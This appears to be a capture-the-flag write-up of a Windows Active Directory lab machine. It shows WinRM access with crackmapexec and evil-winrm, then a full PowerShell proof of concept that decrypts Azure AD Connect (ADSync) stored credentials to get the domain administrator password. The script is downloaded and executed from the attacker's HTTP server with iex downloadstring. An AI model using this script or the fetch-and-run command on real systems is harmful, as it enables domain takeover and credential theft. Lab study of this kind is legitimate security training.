fw--w--w-- 1212 Fri Jan 3 23:59:24 2020 azure.xml
winrm
Check with crackmapexec whether WinRM login is possible.
$ crackmapexec winrm 10.129.228.111 -u mhope -p 4n0therD4y@n0th3r$
SMB 10.129.228.111 5985 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP 10.129.228.111 5985 MONTEVERDE [*] http://10.129.228.111:5985/wsman
WINRM 10.129.228.111 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
pwn3d!
Getting a shell and the user flag through evil-winrm
$ evil-winrm -i 10.129.228.111 -u mhope -p 4n0therD4y@n0th3r$
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
flag
Look at mhope with net user. The account is a member of Azure Admins.
*Evil-WinRM* PS C:\Users> net user mhope
User name mhope
Full Name Mike Hope
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/2/2020 4:40:05 PM
Password expires Never
Password changeable 1/3/2020 4:40:05 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory \\monteverde\users$\mhope
Last logon 9/17/2023 4:03:09 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Azure Admins *Domain Users
The command completed successfully.
AZURE POC
https://blog.xpnsec.com/azuread-connect-for-redteam/
The blog above contains a PoC. Copy the PoC to Kali and run it on the target.
$ vim root.ps1
:set paste
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;Database=ADSync;Integrated Security=True"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
$ python -m http.server 8081
*Evil-WinRM* PS C:\Users> iex(new-object net.webclient).downloadstring('http://10.10.14.3:8081/root.ps1')
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
root flag
$ evil-winrm -i 10.129.228.111 -u administrator -p 'd0m@in4dminyeah!'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt